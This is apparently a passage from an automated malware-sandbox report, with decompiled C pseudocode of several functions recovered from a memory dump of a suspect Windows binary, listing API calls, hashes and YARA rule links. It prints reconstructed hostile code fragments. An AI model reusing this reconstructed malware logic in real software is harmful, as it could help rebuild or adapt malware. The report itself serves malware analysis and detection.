					} else {
						_push( &_v16);
						_push( &_v8);
						_push(_t47);
						_push(0);
						_push(0x16);
						_push( *((intOrPtr*)(__esi + 0x18)));
						if( *_t63() == 0) {
							_v12 = GetLastError();
						} else {
							_v8 = _v8 >> 1;
							 *((short*)(_v20 + _v8 * 2)) = 0;
							_t64 = E00F155DC(_v8 + 1);
							if(_t64 == 0) {
								_v12 = 8;
							} else {
								wcstombs(_t64, _v20, _v8 + 1);
								 *(__esi + 0xc) = _t64;
							}
						}
						E00F16DFA(_v20);
					}
					goto L12;
				}
			}












                            0x00f13020
                            0x00f13029
                            0x00f1302c
                            0x00f1302f
                            0x00f13031
                            0x00f13034
                            0x00f13115
                            0x00f1311b
                            0x00f1311b
                            0x00f1303e
                            0x00f13045
                            0x00f1304d
                            0x00f1310c
                            0x00f13112
                            0x00000000
                            0x00f13112
                            0x00f13056
                            0x00f1305a
                            0x00f1305b
                            0x00f1305c
                            0x00f13062
                            0x00f13063
                            0x00f13068
                            0x00f1306f
                            0x00000000
                            0x00f13075
                            0x00f13084
                            0x00f13087
                            0x00f1308a
                            0x00f13093
                            0x00f1309a
                            0x00f1309d
                            0x00f13103
                            0x00f1309f
                            0x00f130a2
                            0x00f130a6
                            0x00f130a7
                            0x00f130a8
                            0x00f130a9
                            0x00f130ab
                            0x00f130b2
                            0x00f130f6
                            0x00f130b4
                            0x00f130b4
                            0x00f130bd
                            0x00f130cb
                            0x00f130cf
                            0x00f130e7
                            0x00f130d1
                            0x00f130da
                            0x00f130e2
                            0x00f130e2
                            0x00f130cf
                            0x00f130fc
                            0x00f130fc
                            0x00000000
                            0x00f1309d

                            APIs
                            • GetLastError.KERNEL32 ref: 00F1310C
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • wcstombs.NTDLL ref: 00F130DA
                            • GetLastError.KERNEL32 ref: 00F130F0
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLast$AllocateHeapwcstombs
                            • String ID:
                            • API String ID: 2631933831-0
                            • Opcode ID: c1f6c1ecc3b5da90f7b04fd557ef276d9e8b3e10f9a85a7105dc1a607ba8d1f5
                            • Instruction ID: 6942bf2eec4bef9e7240f7337da48b001842576775945d7cf49c6a4c36110a6c
                            • Opcode Fuzzy Hash: c1f6c1ecc3b5da90f7b04fd557ef276d9e8b3e10f9a85a7105dc1a607ba8d1f5
                            • Instruction Fuzzy Hash: E931F9B6D00208FFDB10DFA5CC819EEBBB8EB48344B104569E512E3251DA719B84AF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14C56, Relevance: 4.6, APIs: 3, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F14C56(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				void* _t37;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E00F15EF5(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0xf1d2b8; // 0x48da5a8
				_t4 = _t24 + 0xf1ee10; // 0x57f93b8
				_t26 = E00F1A415( &_v16, _v8, _t24 + 0xf1edb8, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0xf1d2b8; // 0x48da5a8
						_t11 = _t32 + 0xf1ee04; // 0x57f93ac
						_t48 = _t11;
						_t52 = E00F15434(_t11, _t32 + 0xf1edb8, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0xf1d2b8; // 0x48da5a8
							_t37 = E00F13A79(_t48, _t50, _t59, _v8, _t52, _t35 + 0xf1ee4e, 0x14); // executed
							if(_t37 == 0) {
								_t61 =  *0xf1d294 - 6;
								if( *0xf1d294 <= 6) {
									_t42 =  *0xf1d2b8; // 0x48da5a8
									E00F13A79(_t48, _t50, _t61, _v8, _t52, _t42 + 0xf1ed9a, 0x13);
								}
							}
							_t38 =  *0xf1d2b8; // 0x48da5a8
							_t17 = _t38 + 0xf1ee48; // 0x57f93f0
							_t45 = E00F14FA0(_v8, 0x80000001, _t52, _t38 + 0xf1ee20, _t17);
							HeapFree( *0xf1d270, 0, _t52);
						}
					}
					HeapFree( *0xf1d270, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E00F17424(_t54);
				}
				return _t45;
			}



















                            0x00f14c56
                            0x00f14c66
                            0x00f14c69
                            0x00f14c70
                            0x00f14c72
                            0x00f14c72
                            0x00f14c75
                            0x00f14c7a
                            0x00f14c8e
                            0x00f14c93
                            0x00f14c97
                            0x00f14ca5
                            0x00f14cb3
                            0x00f14cb7
                            0x00f14d48
                            0x00f14d48
                            0x00f14cbd
                            0x00f14cbd
                            0x00f14cc2
                            0x00f14cc2
                            0x00f14cd5
                            0x00f14cd7
                            0x00f14cd9
                            0x00f14cdb
                            0x00f14ced
                            0x00f14cf4
                            0x00f14cf6
                            0x00f14cfd
                            0x00f14cff
                            0x00f14d11
                            0x00f14d11
                            0x00f14cfd
                            0x00f14d16
                            0x00f14d1b
                            0x00f14d40
                            0x00f14d42
                            0x00f14d42
                            0x00f14cd9
                            0x00f14d54
                            0x00f14d54
                            0x00f14d56
                            0x00f14d5b
                            0x00f14d5d
                            0x00f14d5d
                            0x00f14d68

                            APIs
                            • StrToIntExW.SHLWAPI(?,00000000,?,?,?,057F93B8,00000000,?,7519F710,00000000,7519F730), ref: 00F14CA5
                            • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,?,057F93F0,?,00000000,?,00000014,?,057F93AC), ref: 00F14D42
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,00F150D9), ref: 00F14D54
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FreeHeap
                            • String ID:
                            • API String ID: 3298025750-0
                            • Opcode ID: c4a972b486b6166d9df22151b6994b696e4ac0d1d17f96beb6fec9431122be47
                            • Instruction ID: 79beb518dff8193f3fc3bb248f38ccb3e75a5561ec032a14b8024f1c49d9be20
                            • Opcode Fuzzy Hash: c4a972b486b6166d9df22151b6994b696e4ac0d1d17f96beb6fec9431122be47
                            • Instruction Fuzzy Hash: 0931B136900119FFDF11DB94EC85EEA7BBCEB48700F164096B9049B071D6B5AE84FB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F15B5B, Relevance: 4.6, APIs: 3, Instructions: 76memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 50%
                            			E00F15B5B(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				void* _v8;
				void* __edi;
				intOrPtr _t18;
				void* _t24;
				void* _t30;
				void* _t37;
				void* _t40;
				intOrPtr _t42;

				_t37 = __edx;
				_t32 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t42 =  *0xf1d370; // 0x57f9b68
				_push(0x800);
				_push(0);
				_push( *0xf1d270);
				if( *0xf1d284 >= 5) {
					if(RtlAllocateHeap() == 0) {
						L6:
						_t30 = 8;
						L7:
						if(_t30 != 0) {
							L10:
							 *0xf1d284 =  *0xf1d284 + 1;
							L11:
							return _t30;
						}
						_t44 = _a4;
						_t40 = _v8;
						 *_a16 = _a4;
						 *_a20 = E00F147A4(_t44, _t40); // executed
						_t18 = E00F16A16(_t40, _t44); // executed
						if(_t18 != 0) {
							 *_a8 = _t40;
							 *_a12 = _t18;
							if( *0xf1d284 < 5) {
								 *0xf1d284 =  *0xf1d284 & 0x00000000;
							}
							goto L11;
						}
						_t30 = 0xbf;
						E00F155F1();
						HeapFree( *0xf1d270, 0, _t40);
						goto L10;
					}
					_t24 = E00F16367(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t13);
					L5:
					_t30 = _t24;
					goto L7;
				}
				if(RtlAllocateHeap() == 0) {
					goto L6;
				}
				_t24 = E00F17132(_a4, _t32, _t37, _t42,  &_v8,  &_a4, _t25);
				goto L5;
			}











                            0x00f15b5b
                            0x00f15b5b
                            0x00f15b5e
                            0x00f15b5f
                            0x00f15b69
                            0x00f15b70
                            0x00f15b75
                            0x00f15b77
                            0x00f15b7d
                            0x00f15ba5
                            0x00f15bbd
                            0x00f15bbf
                            0x00f15bc0
                            0x00f15bc2
                            0x00f15c00
                            0x00f15c00
                            0x00f15c06
                            0x00f15c0c
                            0x00f15c0c
                            0x00f15bc4
                            0x00f15bca
                            0x00f15bcd
                            0x00f15bdc
                            0x00f15bde
                            0x00f15be5
                            0x00f15c19
                            0x00f15c1e
                            0x00f15c20
                            0x00f15c22
                            0x00f15c22
                            0x00000000
                            0x00f15c20
                            0x00f15be7
                            0x00f15bec
                            0x00f15bfa
                            0x00000000
                            0x00f15bfa
                            0x00f15bb4
                            0x00f15bb9
                            0x00f15bb9
                            0x00000000
                            0x00f15bb9
                            0x00f15b87
                            0x00000000
                            0x00000000
                            0x00f15b96
                            0x00000000

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00F15B7F
                              • Part of subcall function 00F17132: GetTickCount.KERNEL32 ref: 00F17146
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F17196
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F171B3
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F171DF
                              • Part of subcall function 00F17132: HeapFree.KERNEL32(00000000,?), ref: 00F171F1
                              • Part of subcall function 00F17132: wsprintfA.USER32 ref: 00F17212
                              • Part of subcall function 00F17132: HeapFree.KERNEL32(00000000,?), ref: 00F17222
                              • Part of subcall function 00F17132: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 00F17250
                              • Part of subcall function 00F17132: GetTickCount.KERNEL32 ref: 00F17261
                            • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 00F15B9D
                            • HeapFree.KERNEL32(00000000,?,?,?,00F1512B,00000002,?,?,?,?), ref: 00F15BFA
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Heap$wsprintf$AllocateFree$CountTick
                            • String ID:
                            • API String ID: 1676223858-0
                            • Opcode ID: 012bb4ee55b9079079bf33f336532dfde7113874795e1804903c4052fee382b3
                            • Instruction ID: b17734f95b1efc0e6f17e37ef79d969ade4427bc549324849b27417b5ae986bb
                            • Opcode Fuzzy Hash: 012bb4ee55b9079079bf33f336532dfde7113874795e1804903c4052fee382b3
                            • Instruction Fuzzy Hash: 4B219ABA201609EFCB019F64DD40EDA37BDAB89740F11402AF901D7250DB74E985ABA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1456E, Relevance: 4.6, APIs: 3, Instructions: 73memorystringCOMMON
                            Download Yara Rule
                            C-Code - Quality: 79%
                            			E00F1456E(void* __eax, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t33;
				void* _t38;
				void* _t45;
				char* _t46;
				void* _t48;
				char* _t56;
				char* _t57;
				intOrPtr _t59;
				void* _t60;

				_t56 = _a4;
				_t60 = __eax;
				_v12 = 0xb;
				if(_t56 != 0 && __eax != 0) {
					_t5 = _t60 - 1; // -1
					_t46 =  &(_t56[_t5]);
					_t28 =  *_t46;
					_v5 = _t28;
					 *_t46 = 0;
					__imp__(_a8, _t45);
					_v16 = _t28;
					_t57 = StrStrA(_t56, _a8);
					if(_t57 != 0) {
						 *_t46 = _v5;
						_t33 = RtlAllocateHeap( *0xf1d270, 0, _a16 + _t60); // executed
						_t48 = _t33;
						if(_t48 == 0) {
							_v12 = 8;
						} else {
							_t58 = _t57 - _a4;
							E00F1AA99(_t57 - _a4, _a4, _t48);
							_t38 = E00F1AA99(_a16, _a12, _t58 + _t48);
							_t53 = _v16;
							_t59 = _a16;
							E00F1AA99(_t60 - _t58 - _v16, _t53 + _t58 + _a4, _t38 + _t59);
							 *_a20 = _t48;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t60 - _v16 + _t59;
						}
					}
				}
				return _v12;
			}
















                            0x00f14576
                            0x00f1457b
                            0x00f1457d
                            0x00f14584
                            0x00f14596
                            0x00f14596
                            0x00f1459a
                            0x00f1459c
                            0x00f1459f
                            0x00f145a2
                            0x00f145ab
                            0x00f145b5
                            0x00f145b9
                            0x00f145be
                            0x00f145ce
                            0x00f145d4
                            0x00f145d8
                            0x00f14627
                            0x00f145da
                            0x00f145da
                            0x00f145e3
                            0x00f145f2
                            0x00f145f7
                            0x00f14604
                            0x00f1460d
                            0x00f14618
                            0x00f1461f
                            0x00f14623
                            0x00f14623
                            0x00f145d8
                            0x00f1462e
                            0x00f14635

                            APIs
                            • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 00F145A2
                            • StrStrA.SHLWAPI(00000000,?), ref: 00F145AF
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 00F145CE
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocateHeaplstrlen
                            • String ID:
                            • API String ID: 556738718-0
                            • Opcode ID: ad5e73908ef7dcc92045c91a8657821ccfd54fcf675f57fd0566b4fe8731061d
                            • Instruction ID: e3f65c59ba7d5d10a62cdac3accffcd7a33c906cc7c9f5dc57b9b592d46c5e39
                            • Opcode Fuzzy Hash: ad5e73908ef7dcc92045c91a8657821ccfd54fcf675f57fd0566b4fe8731061d
                            • Instruction Fuzzy Hash: 4E217A36A0011AAFCB11CFA8D884BDEBFB5EF89315F058155E804EB315C734E955DBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F1311C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                            Download Yara Rule
                            C-Code - Quality: 47%
                            			E00F1311C(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E00F155DC(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0xf1c2a4); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                            0x00f13120
                            0x00f1312d
                            0x00f1312f
                            0x00f13130
                            0x00f13138
                            0x00f13138
                            0x00f1313c
                            0x00000000
                            0x00000000
                            0x00f13133
                            0x00f13134
                            0x00f13137
                            0x00f13137
                            0x00f13144
                            0x00f1314b
                            0x00f1314e
                            0x00f13156
                            0x00f1315c
                            0x00f1315e
                            0x00f13161
                            0x00f13165
                            0x00f13167
                            0x00f1316a
                            0x00f1316a
                            0x00f1316b
                            0x00f1316d
                            0x00f1316a
                            0x00f13177
                            0x00f1317a
                            0x00f1317d
                            0x00f13180
                            0x00f13180
                            0x00f13187
                            0x00f13187
                            0x00f13193

                            APIs
                            • StrChrA.SHLWAPI(?,00000020,00000000,057F95AC,?,?,00F13A64,?,057F95AC), ref: 00F13138
                            • StrTrimA.SHLWAPI(?,00F1C2A4,00000002,?,00F13A64,?,057F95AC), ref: 00F13156
                            • StrChrA.SHLWAPI(?,00000020,?,00F13A64,?,057F95AC), ref: 00F13161
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Trim
                            • String ID:
                            • API String ID: 3043112668-0
                            • Opcode ID: 9a8e56632d9f20a67e36e8bc9b8b256e9fde0debe40bc00815d7e1d55d5b2c7d
                            • Instruction ID: e1c58d643a8260ee48c11fefffbd670d05fdd6b1c2d5f81810fe678f93e2daab
                            • Opcode Fuzzy Hash: 9a8e56632d9f20a67e36e8bc9b8b256e9fde0debe40bc00815d7e1d55d5b2c7d
                            • Instruction Fuzzy Hash: 3C01B172B003457EE7105A6A8C44FE73B9DEB897A0F148011B945EB282D670CD82E660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F162E1, Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 48COMMON
                            Download Yara Rule
                            C-Code - Quality: 63%
                            			E00F162E1(intOrPtr __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v60;
				char _v64;
				long _t14;
				intOrPtr _t18;
				intOrPtr _t19;
				intOrPtr _t26;
				intOrPtr _t27;
				long _t28;

				_t27 = __edi;
				_t26 = _a8;
				_t14 = E00F16FB2(_a4, _t26, __edi); // executed
				_t28 = _t14;
				if(_t28 != 0) {
					memset( &_v60, 0, 0x38);
					_t18 =  *0xf1d2b8; // 0x48da5a8
					_t28 = 0;
					_v64 = 0x3c;
					if(_a12 == 0) {
						_t19 = _t18 + 0xf1e4e8;
					} else {
						_t19 = _t18 + 0xf1e8d0;
					}
					_v52 = _t19;
					_push(_t28);
					_v48 = _a4;
					_v44 = _t26;
					_v36 = _t27;
					E00F12522();
					_push( &_v64);
					if( *0xf1d0e4() == 0) {
						_t28 = GetLastError();
					}
					_push(1);
					E00F12522();
				}
				return _t28;
			}















                            0x00f162e1
                            0x00f162e8
                            0x00f162f1
                            0x00f162f6
                            0x00f162fa
                            0x00f16304
                            0x00f16309
                            0x00f1630e
                            0x00f16316
                            0x00f1631d
                            0x00f16327
                            0x00f1631f
                            0x00f1631f
                            0x00f1631f
                            0x00f1632d
                            0x00f16333
                            0x00f16334
                            0x00f16337
                            0x00f1633a
                            0x00f1633d
                            0x00f16345
                            0x00f1634e
                            0x00f16356
                            0x00f16356
                            0x00f16358
                            0x00f1635a
                            0x00f1635a
                            0x00f16364

                            APIs
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(00000000), ref: 00F1700E
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(?), ref: 00F17022
                              • Part of subcall function 00F16FB2: SysAllocString.OLEAUT32(00000000), ref: 00F17034
                              • Part of subcall function 00F16FB2: SysFreeString.OLEAUT32(00000000), ref: 00F17098
                            • memset.NTDLL ref: 00F16304
                            • GetLastError.KERNEL32 ref: 00F16350
                            Strings
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: String$Alloc$ErrorFreeLastmemset
                            • String ID: <
                            • API String ID: 1330562889-4251816714
                            • Opcode ID: 633cbd3bab288509951051262754eb04466caa3b4f88481e03536eb354e4108f
                            • Instruction ID: bf54e352dbdfa27335c4e73e0021bdcc27bb0187e91ac3565d575df1bfda1a00
                            • Opcode Fuzzy Hash: 633cbd3bab288509951051262754eb04466caa3b4f88481e03536eb354e4108f
                            • Instruction Fuzzy Hash: 47018071D00218EBDB10EFA8DC85EDEBBF8BB08750F45402AF904E7251D774C980ABA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F160DD, Relevance: 3.8, APIs: 3, Instructions: 81COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00F160DD(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				int _v12;
				signed int _v16;
				void* _v20;
				signed char _v36;
				void* _t24;
				intOrPtr _t27;
				signed int _t38;
				signed char* _t46;
				int _t53;
				void* _t55;
				void* _t56;
				void* _t57;

				_v16 = _v16 & 0x00000000;
				_t46 = _a4;
				_t53 = ( *_t46 & 0x000000ff) + 0x110;
				_v12 = 0x110;
				_t24 = E00F155DC(_t53);
				_a4 = _t24;
				if(_t24 != 0) {
					memcpy(_t24,  *0xf1d308, 0x110);
					_t27 =  *0xf1d30c; // 0x0
					_t57 = _t56 + 0xc;
					if(_t27 != 0) {
						_t51 = _a4;
						E00F16E0F(0x110, _a4, _t27, 0);
					}
					if(E00F18DD3( &_v36) != 0 && E00F16E7F(0x110, _a4,  &_v20,  &_v12,  &_v36, 0) == 0) {
						_t55 = _v20;
						_v36 =  *_t46;
						_t38 = E00F12363(_t55, _a8, _t51, _t46, _a12); // executed
						_v16 = _t38;
						 *(_t55 + 4) = _v36;
						memset(_t55, 0, _v12 - (_t46[4] & 0xf));
						_t57 = _t57 + 0xc;
						E00F16DFA(_t55);
					}
					memset(_a4, 0, _t53);
					E00F16DFA(_a4);
				}
				return _v16;
			}















                            0x00f160e3
                            0x00f160e8
                            0x00f160f5
                            0x00f160f8
                            0x00f160fb
                            0x00f16102
                            0x00f16105
                            0x00f16113
                            0x00f16118
                            0x00f1611d
                            0x00f16122
                            0x00f16124
                            0x00f1612c
                            0x00f1612c
                            0x00f1613b
                            0x00f1615e
                            0x00f16164
                            0x00f1616a
                            0x00f16172
                            0x00f16178
                            0x00f16188
                            0x00f1618d
                            0x00f16191
                            0x00f16191
                            0x00f1619c
                            0x00f161a7
                            0x00f161a7
                            0x00f161b3

                            APIs
                              • Part of subcall function 00F155DC: RtlAllocateHeap.NTDLL(00000000,00000000,00F1552C), ref: 00F155E8
                            • memcpy.NTDLL(00000000,00000110,?,?,?,00000008), ref: 00F16113
                            • memset.NTDLL ref: 00F16188
                            • memset.NTDLL ref: 00F1619C
                            Memory Dump Source
                            • Source File: 00000004.00000002.914001515.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true
                            • Associated: 00000004.00000002.913987670.0000000000F10000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914018514.0000000000F1C000.00000002.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914031935.0000000000F1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000004.00000002.914045747.0000000000F1F000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: memset$AllocateHeapmemcpy
                            • String ID:
                            • API String ID: 1529149438-0
                            • Opcode ID: 76bcf1a56a922433fa7a9a302c5fff9d8186457caebea78c61d71590b1e18f47
                            • Instruction ID: 7d84e401e0ac408e7f9440a5a13b92ba5a62ffee000d990573ed373c52e7a56d
                            • Opcode Fuzzy Hash: 76bcf1a56a922433fa7a9a302c5fff9d8186457caebea78c61d71590b1e18f47
                            • Instruction Fuzzy Hash: 41213175A00218BBDB11AF55CC41FDE7BB8AF08754F044065F905E6242EB38DA91DBA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00F14176, Relevance: 3.1, APIs: 2, Instructions: 147serviceCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E00F14176(intOrPtr _a4) {
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				void* _v46;
				short _v48;
				intOrPtr _t49;
				void* _t51;
				intOrPtr* _t53;
				intOrPtr _t56;
				void* _t58;
				intOrPtr* _t59;
				intOrPtr* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr _t76;
				intOrPtr* _t79;
				short _t81;
				char* _t97;
				intOrPtr _t99;
				void* _t105;
				void* _t107;
				intOrPtr _t111;

				_t81 = 0;
				_v48 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t49 =  *0xf1d2b8; // 0x48da5a8
				_t4 = _t49 + 0xf1e44c; // 0x57f89f4
				_t51 =  *0xf1d124(_t49 + 0xf1e43c, 0, 4, _t4,  &_v20); // executed
				_t105 = _t51;
				if(_t105 >= 0) {
					_t53 = _v20;
					_push( &_v12);
					_push(1);
					_push( &_v32);
					_push(8);
					_t97 =  &_v48;
					_push(_t97);
					_push(_t97);
					_push(_t53); // executed
					if( *((intOrPtr*)( *_t53 + 0x3c))() == 0) {
						_t56 =  *0xf1d2b8; // 0x48da5a8
						_t30 = _t56 + 0xf1e42c; // 0x57f89d4
						_t58 =  *0xf1d0f0(_v12, _t56 + 0xf1e45c, _t30,  &_v24); // executed
						_t105 = _t58;
						_t59 = _v12;
						 *((intOrPtr*)( *_t59 + 8))(_t59);
						goto L11;
					} else {
						_t71 = _v20;
						_v16 = 0;
						_t105 =  *((intOrPtr*)( *_t71 + 0x1c))(_t71,  &_v16);
						if(_t105 >= 0) {
							_t111 = _v16;
							if(_t111 == 0) {
								_t105 = 0x80004005;
								goto L11;
							} else {
								if(_t111 <= 0) {
									L11:
									if(_t105 >= 0) {
										goto L12;
									}
								} else {
									do {
										_t73 = _v20;
										_v48 = 3;
										_v40 = _t81;
										_t107 = _t107 - 0x10;
										asm("movsd");
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t105 =  *((intOrPtr*)( *_t73 + 0x20))(_t73,  &_v12);
										if(_t105 < 0) {
											goto L7;
										} else {
											_t76 =  *0xf1d2b8; // 0x48da5a8
											_t23 = _t76 + 0xf1e42c; // 0x57f89d4
											_t105 =  *0xf1d0f0(_v12, _t76 + 0xf1e45c, _t23,  &_v24);
											_t79 = _v12;
											 *((intOrPtr*)( *_t79 + 8))(_t79);
											if(_t105 >= 0) {
												L12:
												_t63 = _v24;
												_t105 =  *((intOrPtr*)( *_t63 + 0x3c))(_t63,  &_v28);
												if(_t105 >= 0) {
													_t99 =  *0xf1d2b8; // 0x48da5a8
													_t67 = _v28;
													_t105 =  *((intOrPtr*)( *_t67))(_t67, _t99 + 0xf1e41c, _a4);
													_t69 = _v28;
													 *((intOrPtr*)( *_t69 + 8))(_t69);
												}
												_t65 = _v24;
												 *((intOrPtr*)( *_t65 + 8))(_t65);
											} else {
												goto L7;
											}
										}
										goto L15;
										L7:
										_t81 = _t81 + 1;
									} while (_t81 < _v16);
									goto L11;
								}
							}
						}
					}
					L15:
					_t61 = _v20;
					 *((intOrPtr*)( *_t61 + 8))(_t61);
				}
				return _t105;
			}

































                            0x00f14181
                            0x00f14183
                            0x00f1418a
                            0x00f1418b
                            0x00f1418c
                            0x00f1418d
                            0x00f14193
                            0x00f14198
                            0x00f141a9
                            0x00f141af
                            0x00f141b3
                            0x00f141b9
                            0x00f141c1
                            0x00f141c2
                            0x00f141c7
                            0x00f141c8
                            0x00f141ca
                            0x00f141cd
                            0x00f141ce
                            0x00f141cf
                            0x00f141d5
                            0x00f1426a
                            0x00f1426f
                            0x00f14280
                            0x00f14286
                            0x00f14288
                            0x00f1428e
                            0x00000000
                            0x00f141db
                            0x00f141db
                            0x00f141e2
                            0x00f141eb
                            0x00f141ef
                            0x00f141f5
                            0x00f141f8
                            0x00f1425f
                            0x00000000
                            0x00f141fa
                            0x00f141fa
